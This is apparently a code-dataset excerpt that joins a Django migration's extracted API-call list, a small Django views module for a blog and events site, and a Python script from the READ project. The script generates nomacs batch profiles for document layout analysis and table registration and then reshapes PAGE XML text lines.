'"""Uncheck this box to make the comment effectively disappear from the site."""', 'verbose_name': '"""is public"""'}), "(default=True, help_text=\n 'Uncheck this box to make the comment effectively disappear from the site.'\n , verbose_name='is public')\n", (3958, 4095), False, 'from django.db import migrations, models\n'), ((4119, 4320), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead."""', 'verbose_name': '"""is removed"""'}), '(default=False, help_text=\n \'Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead.\'\n , verbose_name=\'is removed\')\n', (4138, 4320), False, 'from django.db import migrations, models\n'), ((4346, 4526), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""content_type_set_for_textcomment"""', 'to': '"""contenttypes.ContentType"""', 'verbose_name': '"""content type"""'}), "(on_delete=django.db.models.deletion.CASCADE, related_name\n ='content_type_set_for_textcomment', to='contenttypes.ContentType',\n verbose_name='content type')\n", (4363, 4526), False, 'from django.db import migrations, models\n'), ((4545, 4624), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""sites.Site"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')\n", (4562, 4624), False, 'from django.db import migrations, models\n'), ((4652, 4834), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""textcomment_comments"""', 'to': 'settings.AUTH_USER_MODEL', 'verbose_name': '"""user"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, related_name='textcomment_comments', to=settings.\n AUTH_USER_MODEL, verbose_name='user')\n", (4669, 4834), False, 'from django.db import migrations, models\n'), ((5207, 5300), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (5223, 5300), False, 'from django.db import migrations, models\n'), ((5325, 5379), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""title"""'}), "(max_length=200, verbose_name='title')\n", (5341, 5379), False, 'from django.db import migrations, models\n'), ((5759, 5821), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""version"""'}), "(default=0, verbose_name='version')\n", (5786, 5821), False, 'from django.db import migrations, models\n'), ((5853, 5923), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""date published"""'}), "(auto_now_add=True, verbose_name='date published')\n", (5873, 5923), False, 'from django.db import migrations, models\n'), ((5955, 6023), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""date end"""'}), "(blank=True, null=True, verbose_name='date end')\n", (5975, 6023), False, 'from django.db import migrations, models\n'), ((6051, 6162), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'default': '(1)', 'editable': '(False)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""sites.Site"""'}), "(default=1, editable=False, on_delete=django.db.models.\n deletion.CASCADE, to='sites.Site')\n", (6068, 6162), False, 'from django.db import migrations, models\n'), ((6185, 6275), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Type"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Type')\n", (6202, 6275), False, 'from django.db import migrations, models\n'), ((6628, 6721), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (6644, 6721), False, 'from django.db import migrations, models\n'), ((6748, 6810), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""version"""'}), "(default=0, verbose_name='version')\n", (6775, 6810), False, 'from django.db import migrations, models\n'), ((6839, 6900), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(10)', 'verbose_name': '"""range"""'}), "(default=10, verbose_name='range')\n", (6866, 6900), False, 'from django.db import migrations, models\n'), ((6929, 6989), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""count"""'}), "(default=0, verbose_name='count')\n", (6956, 6989), False, 'from django.db import migrations, models\n'), ((7018, 7078), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'default': '(0)', 'verbose_name': '"""total"""'}), "(default=0, verbose_name='total')\n", (7045, 7078), False, 'from django.db import migrations, models\n'), ((7238, 7357), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Question"""', 'verbose_name': '"""Question"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Question', verbose_name='Question')\n", (7255, 7357), False, 'from django.db import migrations, models\n'), ((7380, 7470), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Text"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Text')\n", (7397, 7470), False, 'from django.db import migrations, models\n'), ((8005, 8098), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (8021, 8098), False, 'from django.db import migrations, models\n'), ((8411, 8443), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (8427, 8443), False, 'from django.db import migrations, models\n'), ((8469, 8520), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (8497, 8520), False, 'from django.db import migrations, models\n'), ((8549, 8583), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {}), '()\n', (8581, 8583), False, 'from django.db import migrations, models\n'), ((8613, 8750), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'editable': '(False)', 'on_delete': 'django.db.models.deletion.CASCADE', 'related_name': '"""user_ratings"""', 'to': '"""bettertexts.Rating"""'}), "(editable=False, on_delete=django.db.models.deletion.\n CASCADE, related_name='user_ratings', to='bettertexts.Rating')\n", (8630, 8750), False, 'from django.db import migrations, models\n'), ((7155, 7167), 'decimal.Decimal', 'Decimal', (['"""0"""'], {}), "('0')\n", (7162, 7167), False, 'from decimal import Decimal\n')]
|
from django.shortcuts import render
from django.views import View
from django.views.generic import ListView, DetailView, CreateView
from django.http import HttpResponseRedirect
from .models import Post, Comments, Event, EveComm
from django.urls import reverse_lazy, reverse
from django.core.mail import send_mail
from django.conf import settings
import datetime
from .forms import CommentForm, CF
class Index(View):
def get(self, request, *args, **kwargs):
return render(request, 'index.html')
class Quiz(View):
def get(self, request, *args, **kwargs):
return render(request, 'quiz.html')
class Inaug(View):
def get(self, request, *args, **kwargs):
return render(request, 'inauguration.html')
class CodHr(View):
def get(self, request, *args, **kwargs):
return render(request, 'codinghr.html')
class Blogs(ListView):
model = Post
template_name = 'blogs.html'
class Events(ListView):
#model = Event
#template_name = 'events.html'
def get(self, request, *args, **kwargs):
return render(request, 'events.html')
class Eve(ListView):
model = Event
template_name = 'eve.html'
class Article(DetailView):
model = Post
template_name = 'article.html'
class Team(View):
def get(self, request, *args, **kwargs):
return render(request, 'about.html')
class Login(View):
def get(self, request, *args, **kwargs):
return render(request, 'l1.html')
class AddC(CreateView):
model = Comments
form_class = CommentForm
template_name = 'addcomm.html'
#fields = '__all__'
def form_valid(self, form):
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
succes_url = reverse_lazy('blogs')
class EveC(CreateView):
model = EveComm
form_class = CF
template_name = 'addcomm.html'
# fields = '__all__'
def form_valid(self, form):
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
succes_url = reverse_lazy('events')
|
[
"django.shortcuts.render",
"django.urls.reverse_lazy"
] |
[((1739, 1760), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""blogs"""'], {}), "('blogs')\n", (1751, 1760), False, 'from django.urls import reverse_lazy, reverse\n'), ((2028, 2050), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""events"""'], {}), "('events')\n", (2040, 2050), False, 'from django.urls import reverse_lazy, reverse\n'), ((476, 505), 'django.shortcuts.render', 'render', (['request', '"""index.html"""'], {}), "(request, 'index.html')\n", (482, 505), False, 'from django.shortcuts import render\n'), ((585, 613), 'django.shortcuts.render', 'render', (['request', '"""quiz.html"""'], {}), "(request, 'quiz.html')\n", (591, 613), False, 'from django.shortcuts import render\n'), ((694, 730), 'django.shortcuts.render', 'render', (['request', '"""inauguration.html"""'], {}), "(request, 'inauguration.html')\n", (700, 730), False, 'from django.shortcuts import render\n'), ((811, 843), 'django.shortcuts.render', 'render', (['request', '"""codinghr.html"""'], {}), "(request, 'codinghr.html')\n", (817, 843), False, 'from django.shortcuts import render\n'), ((1057, 1087), 'django.shortcuts.render', 'render', (['request', '"""events.html"""'], {}), "(request, 'events.html')\n", (1063, 1087), False, 'from django.shortcuts import render\n'), ((1322, 1351), 'django.shortcuts.render', 'render', (['request', '"""about.html"""'], {}), "(request, 'about.html')\n", (1328, 1351), False, 'from django.shortcuts import render\n'), ((1431, 1457), 'django.shortcuts.render', 'render', (['request', '"""l1.html"""'], {}), "(request, 'l1.html')\n", (1437, 1457), False, 'from django.shortcuts import render\n')]
|
# -*- coding: utf-8 -*-
"""
performCVLLA.py
create profile for nomacs (CVL LA toolkit)
<NAME>
copyright Xerox 2017
READ project
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
import sys, os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
import glob
import common.Component as Component
from common.trace import traceln
from xml_formats.PageXml import PageXml
from xml_formats.PageXml import MultiPageXml
from util.Polygon import Polygon
from lxml import etree
class LAProcessor(Component.Component):
"""
"""
usage = ""
version = "v.01"
description = "description: Nomacs LA processor"
if sys.platform == 'win32':
cNomacs = '"C:\\Program Files\\READFramework\\bin\\nomacs.exe"'
else:
cNomacs = "/opt/Tools/src/tuwien-2017/nomacs/nomacs"
cCVLLAProfile = """
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\General\\useTextRegions=%s
PluginBatch\LayoutPlugin\Layout Analysis Module\computeSeparators=true
PluginBatch\LayoutPlugin\Layout Analysis Module\localBlockOrientation=false
PluginBatch\LayoutPlugin\Layout Analysis Module\maxImageSide=3000
PluginBatch\LayoutPlugin\Layout Analysis Module\minSuperPixelsPerBlock=15
PluginBatch\LayoutPlugin\Layout Analysis Module\\removeWeakTextLines=true
PluginBatch\LayoutPlugin\Layout Analysis Module\scaleMode=1
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\pluginList=Layout Analysis | Layout Analysis
SaveInfo\Compression=-1
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
SaveInfo\Mode=2
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Layout Analysis Module\\removeWeakTextLines=true
"""
#PluginBatch\pluginList="Layout Analysis | Layout Analysis;Layout Analysis | Detect Lines"
cCVLLASeparatorProfile="""
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
PluginBatch\pluginList=Layout Analysis | Detect Separator Lines
PluginBatch\LayoutPlugin\General\\useTextRegions=false
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
"""
cCVLProfileTabReg ="""
[%%General]
FileList="%s"
OutputDirPath="%s"
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
PluginBatch\pluginList=Forms Analysis | Apply template (Match)
PluginBatch\FormAnalysis\FormFeatures\\formTemplate="%s"
PluginBatch\FormAnalysis\FormFeatures\distThreshold=200
PluginBatch\FormAnalysis\FormFeatures\colinearityThreshold=20
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdLower=0.5
PluginBatch\FormAnalysis\FormFeatures\\variationThresholdUpper=0.55
PluginBatch\FormAnalysis\FormFeatures\saveChilds=false
"""
# cCVLProfileTabReg ="""
# [%%General]
# FileList="%s"
# OutputDirPath="%s"
# FileNamePattern=<c:0>.<old>
# SaveInfo\Compression=-1
# SaveInfo\Mode=2
# SaveInfo\DeleteOriginal=false
# SaveInfo\InputDirIsOutputDir=true
# PluginBatch\pluginList=Forms Analysis | Apply template (Match)
# PluginBatch\FormAnalysis\FormFeatures\\formTemplate="%s"
# PluginBatch\FormAnalysis\FormFeatures\distThreshold=200
# PluginBatch\FormAnalysis\FormFeatures\colinearityThreshold=20
# PluginBatch\FormAnalysis\FormFeatures\\variationThresholdLower=0.5
# PluginBatch\FormAnalysis\FormFeatures\\variationThresholdUpper=0.55
# PluginBatch\FormAnalysis\FormFeatures\saveChilds=false
# """
#--- INIT -------------------------------------------------------------------------------------------------------------
def __init__(self):
"""
Always call first the Component constructor.
"""
Component.Component.__init__(self, "tableProcessor", self.usage, self.version, self.description)
self.coldir = None
self.docid= None
self.bKeepRegion = False
self.bKeepTL=False
self.bTemplate = False
self.bBaseLine = False
self.bSeparator = False
self.bRegularTextLine = False
self.sTemplateFile = None
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
def setParams(self, dParams):
"""
Always call first the Component setParams
Here, we set our internal attribute according to a possibly specified value (otherwise it stays at its default value)
"""
Component.Component.setParams(self, dParams)
if "coldir" in dParams.keys():
self.coldir = dParams["coldir"].strip()
if "docid" in dParams.keys():
self.docid = dParams["docid"].strip()
# if dParams.has_key("bRegion"):
# self.bKeepRegion = dParams["bRegion"]
if "bTL" in dParams.keys():
self.bKeepTL = dParams["bTL"]
if "bBaseline" in dParams.keys():
self.bBaseLine = dParams["bBaseline"]
if "bSeparator" in dParams.keys():
self.bSeparator = dParams["bSeparator"]
if "template" in dParams.keys():
self.bTemplate = dParams["template"]
if "regTL" in dParams.keys():
self.bRegularTextLine = dParams["regTL"]
if "templatefile" in dParams.keys():
self.sTemplateFile = dParams["templatefile"]
self.bTemplate=True
def reintegrateTextIntoCells(self,doc,lLTextLines=[]):
"""
from XMLDSTABLE
"""
def overlapX(zone1,zone2):
[a1,a2] = zone1 #self.getX(),self.getX()+ self.getWidth()
[b1,b2] = zone2 #zone.getX(),zone.getX()+ zone.getWidth()
return min(a2, b2) >= max(a1, b1)
def overlapY(zone1,zone2):
[a1,a2] = zone1 #self.getY(),self.getY() + self.getHeight()
[b1,b2] = zone2 #zone.getY(),zone.getY() + zone.getHeight()
return min(a2, b2) >= max(a1, b1)
def signedRatioOverlap(zone1,zone2):
"""
overlap self and zone
return surface of self in zone
"""
[x1,y1,x12,y12] = zone1 #self.getX(),self.getY(),self.getHeight(),self.getWidth()
[x2,y2,x22,y22] = zone2 #zone.getX(),zone.getY(),zone.getHeight(),zone.getWidth()
w1,h1 = x12-x1,y12-y1
w2,h2 = x22-x2,y22-y2
fOverlap = 0.0
# print (x1,x12),(x2,x22)
# print overlapX((x1,x12),(x2,x22))
# print (y1,y12),(y2,y22)
# print overlapY((y1,y12),(y2,y22))
# if overlapX((x1,w1),(x2,w2)) and overlapY((y1,h1),(y2,h2)):
if overlapX((x1,x12),(x2,x22)) and overlapY((y1,y12),(y2,y22)):
[x11,y11,x12,y12] = [x1,y1,x1+w1,y1+h1]
[x21,y21,x22,y22] = [x2,y2,x2+w2,y2+h2]
s1 = w1 * h1
# possible ?
if s1 == 0: s1 = 1.0
#intersection
nx1 = max(x11,x21)
nx2 = min(x12,x22)
ny1 = max(y11,y21)
ny2 = min(y12,y22)
h = abs(nx2 - nx1)
w = abs(ny2 - ny1)
inter = h * w
if inter > 0 :
fOverlap = inter/s1
else:
# if overX and Y this is not possible !
fOverlap = 0.0
return fOverlap
def bestRegionsAssignment(plgtl,lRegions):
"""
find the best (max overlap for self) region for self
"""
lOverlap=[]
for _,plg in lRegions:
lOverlap.append(signedRatioOverlap(plgtl.getBoundingBox(),plg.getBoundingBox()))
# print plgtl.getBoundingBox(), lOverlap
if max(lOverlap) == 0: return None
return lRegions[lOverlap.index(max(lOverlap))]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
lRegionsToBeDeleted = []
for i, page in enumerate(lPages):
if lLTextLines == []:
lTextLines = PageXml.getChildByName(page,'TextLine')
else: lTextLines =lLTextLines[i]
lCells = PageXml.getChildByName(page,'TableCell')
# print len(lCells),len(lTextLines)
lOCells=[]
for cell in lCells:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = cell.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
lOCells.append((cell,plg))
# find the best assignment of each text
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
cell = bestRegionsAssignment(plg,lOCells)
if cell:
c,_=cell
lRegionsToBeDeleted.append(c.parent)
## what about parent TextRegion delete at least TextRegion/TextEquiv
# tl.unlinkNode()
tlcp = tl.docCopyNode(c.doc,True)
# tlcp.unlinkNode()
c.append(tlcp)
# print c
for region in lRegionsToBeDeleted:
region.getParent().remove(region)
# region.unlinkNode()
# region.freeNode()
def reinitPage(self,doc):
"""
empty page
"""
lNodes = PageXml.getChildByName(doc.getroot(),'Page')
for node in lNodes:
node.unlinkNode()
def findTemplate(self,doc):
"""
find the page where the first TableRegion occurs and extract it
"""
from copy import deepcopy
lT = PageXml.getChildByName(doc.getroot(),'TableRegion')
if lT == []:
return None
firstTable=lT[0]
# lazy guy!
newDoc,fakepage = PageXml.createPageXmlDocument('NLE', '', 0,0)
page=firstTable.getparent()
fakepage.set("imageFilename",page.get('imageFilename'))
fakepage.set("imageWidth",page.get('imageWidth'))
fakepage.set("imageHeight",page.get('imageHeight'))
page.getparent().remove(page)
# add table
xx =deepcopy(firstTable)
fakepage.append(xx)
return newDoc
def createRegistrationProfile(self,sTemplatefile):
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
txt= LAProcessor.cCVLProfileTabReg % (listfile,localpath.replace(os.sep,"/"),os.path.abspath("%s"%(sTemplatefile)).replace(os.sep,"/"))
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_reg.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'w', encoding="utf-8")
f.write(txt)
return prnfilename
def createLinesProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLASeparatorProfile % (listfile,localpath)
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_gl.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'wb')
f.write(txt)
return prnfilename
def createLAProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLAProfile % (listfile,localpath,self.bKeepRegion)
# print txt
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_la.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'wb')
f.write(txt)
return prnfilename
def storeMPXML(self,lFiles):
"""
store files in lFiles as mpxml
"""
docDir = os.path.join(self.coldir+os.sep+'col',self.docid)
doc = MultiPageXml.makeMultiPageXml(lFiles)
sMPXML = docDir+".mpxml"
# print sMPXML
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
# trace("\t\t- validating the MultiPageXml ...")
# if not MultiPageXml.validate(doc):
# traceln(" *** WARNING: XML file is invalid against the schema: '%s'"%self.outputFileName)
# traceln(" Ok!")
return doc, sMPXML
def extractFileNamesFromMPXML(self,doc):
"""
to insure correct file order !
"""
xmlpath=os.path.abspath("%s%s%s%s%s" % (self.coldir,os.sep,'col',os.sep,self.docid))
lNd = PageXml.getChildByName(doc.getroot(), 'Page')
# for i in lNd:print i
return list(map(lambda x:"%s%s%s.xml"%(xmlpath,os.sep,x.get('imageFilename')[:-4]), lNd))
def performLA(self,doc):
"""
# for document doc
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
"""
# lNumPages = []
if self.bTemplate or self.bBaseLine or self.bSeparator:
# extract list of files sorted as in MPXML
lFullPathXMLNames = self.extractFileNamesFromMPXML(doc)
nbPages = len(lFullPathXMLNames)
## 1 generate xml files if only pxml are there
xmlpath=os.path.abspath(os.path.join (self.coldir,'col',self.docid))
lXMLNames = [ "%s%s%s"%(xmlpath,os.sep,name) for name in os.listdir(xmlpath) if os.path.basename(name)[-4:] =='.xml']
isXml = [] != lXMLNames
if isXml:
[ os.remove("%s%s%s"%(xmlpath,os.sep,name)) for name in os.listdir(xmlpath) if os.path.basename(name)[-4:] =='.xml']
isXml = False
isPXml = [] != [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
assert not isXml and isPXml
# recreate doc? (mpxml)
lPXMLNames = [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
if not isXml:
# copy pxml in xml
for name in lPXMLNames:
oldname = "%s%s%s" %(xmlpath,os.sep,name)
newname = "%s%s%s" % (xmlpath,os.sep,name)
newname = newname[:-5]+'.xml'
tmpdoc = etree.parse(oldname)
tmpdoc.write(newname,encoding="UTF-8", pretty_print=True,xml_declaration=True)
if self.bKeepTL:
# keep ltextLione
lTextLines=[]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
for page in lPages:
lTextLines.append(PageXml.getChildByName(page,'TextLine'))
## Table registration
if self.bTemplate:
if self.sTemplateFile is None:
templatePage = self.findTemplate(doc)
if templatePage is None:
traceln("No table found in this document: %s" % self.docid)
else:
oldOut= self.outputFileName
self.outputFileName = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
stemplatefile = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
print (stemplatefile)
self.writeDom(templatePage, True)
self.outputFileName = oldOut
prnregfilename= self.createRegistrationProfile(stemplatefile)
else:
# raise Exception, 'file template stuff: to be done'
prnregfilename= self.createRegistrationProfile(self.sTemplateFile)
job = LAProcessor.cNomacs+ " --batch %s"%(prnregfilename)
os.system(job)
traceln('table registration done: %s'% prnregfilename)
## separator detection
if self.bSeparator:
prnglfilename = self.createLinesProfile()
job = LAProcessor.cNomacs+ " --batch %s"%(prnglfilename)
os.system(job)
traceln( 'GL done: %s' % prnglfilename)
## baseline detection
if self.bBaseLine:
prnlafilename = self.createLAProfile()
# job = LAProcessor.cNomacs+ " --batch %s"%(prnlafilename)
job = LAProcessor.cNomacsold+ " --batch %s"%(prnlafilename)
os.system(job)
traceln('LA done: %s' % prnlafilename)
if self.bTemplate or self.bBaseLine or self.bSeparator:
doc, sMPXML= self.storeMPXML(lFullPathXMLNames)
# Does not work with URO LA!
if self.bKeepTL:
self.reintegrateTextIntoCells(doc,lTextLines)
## text rectangles as textline region
if self.bRegularTextLine:
self.regularTextLines(doc)
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
return doc, nbPages
def regularTextLinesold(self,doc):
"""
from a baseline: create a regular TextLine:
also: for slanted baseline:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
baseline = lBL[0]
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
plg = Polygon(lXY)
line=LineString(lXY)
# 50 seems to large: the manual GT is 30 ? not always!
iHeight = 30 # in pixel
x1,y1, x2,y2 = plg.getBoundingBox()
if coord is not None:
coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
else:
print (tl)
def regularTextLines(self,doc):
"""
from a baseline: create a regular TextLine:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
try:baseline = lBL[0]
except IndexError:continue
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
#plg = Polygon(lXY)
try: line=LineString(lXY)
except ValueError: continue # LineStrings must have at least 2 coordinate tuples
topline=translate(line,yoff=-20)
#iHeight = 20 # in pixel
#x1,y1, x2,y2 = topline.getBoundingBox()
if coord is not None:
spoints = ' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in line.coords)
lp=list(topline.coords)
lp.reverse()
spoints =spoints+ ' ' +' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in lp)
#spoints = ' '.join("%s,%s"%(x[0],x[1]) for x in pp.coords)
#coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
coord.set('points',spoints)
else:
print (tl)
# print tl
def run(self,doc):
"""
GT from TextRegion
or GT from Table
input mpxml (GT)
delete TextLine
"""
if not (self.bTemplate or self.bBaseLine or self.bSeparator) and self.bRegularTextLine:
self.regularTextLines(doc)
self.writeDom(doc, True)
else:
doc,nbpages = self.performLA(doc)
return doc
if __name__ == "__main__":
# for each document
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
tp = LAProcessor()
#prepare for the parsing of the command line
tp.createCommandLineParser()
tp.add_option("--coldir", dest="coldir", action="store", type="string", help="collection folder")
tp.add_option("--docid", dest="docid", action="store", type="string", help="document id")
tp.add_option("--bl", dest="bBaseline", action="store_true", default=False, help="detect baselines")
# tp.add_option("--region", dest="bRegion", action="store_true", default=False, help="keep Region")
tp.add_option("--tl", dest="bTL", action="store_true", default=False, help="keep textlines")
tp.add_option("--sep", dest="bSeparator", action="store_true", default=False, help="detect separator (graphical lines)")
tp.add_option("--regTL", dest="regTL", action="store_true", default=False, help="generate regular TextLines")
tp.add_option("--form", dest="template", action="store_true", default=False, help="perform template registration")
tp.add_option("--formfile", dest="templatefile", action="store", type='string', default=None,help="use this template file (pagexml) for registration")
#tp.add_option("--form", dest="template", action="store", type="string", help="perform template registration")
#parse the command line
dParams, args = tp.parseCommandLine()
#Now we are back to the normal programmatic mode, we set the componenet parameters
tp.setParams(dParams)
doc = tp.loadDom()
tp.run(doc)
|
[
"os.path.abspath",
